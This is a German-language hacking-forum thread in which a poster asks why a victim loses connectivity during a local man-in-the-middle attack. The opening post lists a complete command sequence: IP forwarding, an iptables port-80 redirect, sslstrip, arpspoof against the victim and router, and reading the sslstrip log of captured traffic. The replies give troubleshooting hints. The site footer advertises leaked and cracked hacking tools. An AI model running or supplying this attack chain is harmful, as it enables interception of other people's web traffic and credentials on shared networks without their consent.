Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

Lokaler MitM Angriff - Opfer verliert verbindung

- - - - -

  • Bitte melde dich an um zu Antworten
3 Antworten in diesem Thema

#1
ziipzaaapM16A4

ziipzaaapM16A4

    selfban

  • Banned
  • PIPPIP
  • Likes
    2
  • 4 Beiträge
  • 0 Bedankt
  • Android, Android [root]
  • Windows, Linux

Hallo leude,

 

ich weis das Thema ist vlt schon unten durch für euch und trotzdem würde ich es gerne hier mal ansprechen.

Außerdem findet man fast nur englische Topics zu dem Thema. Also am besten hier nochmal für die die kein Englisch können (oder nicht so gut).

(ich kanns)

 

Es geht und die Durchführung einer lokalen Man-in-the-Middle Attack. 

ich hatte damit schon mal erfolg. Ich versuche nur Krampfhaft herauszufinden warum es jetzt nicht mehr funktioniert. 

ich verwende arpspoof, sslstrip und ja ich habe ip_forwarding auf 1. (Erläuterung der Durchführung erfolgt unten)

 

 

Jedoch verliert das Opfer die Verbindung sobald ich mich mit arpspoof dazwischen schalte!

Und laut Foren passiert das nicht nur mit arpspoof. Sondern auch mit ettercap oder andere.

 

 

Ich habe schon einiges aus dem Internet fischen können aber bevor ich hier irgendwelche Forum halb-wahrheiten spreche lass ich lieber die experten das erklären und lösen

 

hier mein verwendeter Code

Kali Linux command line code:

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

sslstrip -l 8080

arpspoof -i <netzwerkkarte> -t <netzwerk ip opfer> <netzwerk ip router>

cat sslstrip.log

MfG

 

 

ziipzaaapM16A4


Bearbeitet von ziipzaaapM16A4, 23 November 2015 - 13:00 Uhr.

  • Chocofresh gefällt das

#2
psner

psner

    Script Kiddie

  • Premium Member
  • Likes
    7
  • 46 Beiträge
  • 0 Bedankt

vielleicht kennst du die seite ja schon, aber mir hatte das tut hier immer mal wieder weiter geholfen

 

Please Login HERE or Register HERE to see this link!



#3
dev-0

dev-0

    Pentester

  • Premium Member
  • Likes
    104
  • 123 Beiträge
  • 166 Bedankt
  • iPhone
  • Windows, Linux

Hi Hi,

was für nen Switch Router hängt da dazwischen ?

Schau mal ob In dem Router ARP_Spoofing Protection aktiv ist bzw wie groß der ARP Table ist.


Bearbeitet von dev-0, 24 November 2015 - 15:44 Uhr.

Man sollte das Leben nicht all zu ernst nehmen, denn man kommt dort eh nicht mehr Lebend raus

 

dev-0@exploit.im


#4
nischke

nischke

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    1
  • 27 Beiträge
  • 1 Bedankt

Ich hatte ähnliche Probleme.. Um was für ein Zielgerät handelt es sich denn? Du hast sicherlich eine VM konfiguriert? Hast du dort schon alle Einstellungen übeprüft? Firewall? Netzwerkkarte etc.? 





  Thema Forum Themenstarter Statistik Letzter Beitrag

Dieses Thema wurde von 49 Mitglied(ern) gelesen


    .:dodo:., and6578, Avni, axxis999, beon, Bot4ng, bumg2, Cheat0r, Chocofresh, Crap, Crowx88, darknide, desmond, dev-0, easysurfer, ellogro, Emalik Xantier, Framerater, frechdax, FullMetall, Goooofy, Hansiberg, highz, Hydra, Janjij, JohnR, lNobodyl, lolorollo, n1nja, nischke, Osed28, PaulaAbdul, pdr0, PHIPU, psner, raider, SavE1, Seldos, Silent0wn3r, Slixer, smc2014, Stanley, Take1T, Toolbase, Toskom4n, twixeis, Unkiii, Xenio, ziipzaaapM16A4
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.